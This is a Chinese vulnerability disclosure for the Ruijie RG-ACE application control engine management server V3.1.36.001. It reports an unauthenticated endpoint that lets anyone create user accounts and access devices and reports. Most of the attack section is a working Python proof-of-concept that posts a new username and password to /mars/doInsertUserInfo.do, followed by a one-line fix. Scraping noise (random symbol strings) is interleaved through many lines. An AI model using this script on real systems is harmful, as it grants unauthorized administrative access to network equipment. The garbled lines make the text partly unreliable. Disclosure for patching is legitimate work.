锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
! _3 E$ y# g; n/ x8 `6 [

测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
; @7 c0 [" z- v! H' [: v编译时间: 201104291730


漏洞证明：
" ?' g0 N2 t$ g7 {& B& P0 W9 [" n6 ?6 p
) h  Y1 y1 q  v3 D

4 o) {! j! A3 }8 M  Q; {4 m0 w
: C! D7 `% A& W1 p

" b7 L) s/ ~& J% x1 {执行脚本
# K! m6 W9 H8 }9 ?8 v& B) ^# g" k6 Z#! /usr/bin/env python
#coding=gbk
8 r5 Z+ N8 ^# u# ?2 f  c#RG-ACE管理服务器 V3.1.36.001
9 C4 A' @3 F+ Z, ]import urllib2, urllib,cookielib
3 R3 a2 c. n# n- ~9 [2 k" d9 curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
0 U; B+ y5 j6 V8 l3 q% Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 H- L+ T% X( l% g# S9 e" ipost=(("event","userManager.doInsertUserInfo"),
  A, d$ V  U. r4 s! h("useractionname","addButtonValue"),
& d( g' M+ K5 a# H+ J8 \1 [' L1 Y("useropermanager","userManager"),
("userName","t"), #######账号自己加
' q8 Y& o. ~5 t  y8 S("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
("addr",""),
+ ?! a7 m" d" F- S4 T6 Y* u("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
6 M' T$ a  V- V( A( i
2 _7 O: G" {: y5 |登录，连接设备


7 a! A5 K7 ]# J; O$ M- h: E
! w3 n( J2 U. X& _

5 [% e9 z$ g; I# I& I% Q# N, i默认的管理员admin权限更大点

; \5 V4 K2 e) F  D$ ^6 x
1 l+ D. b  I8 _/ R
7 r" n4 h0 Y: z- Y

  @  G. G6 ~7 c修复方案：
% q7 d# d' f# l加强对接口的权限验证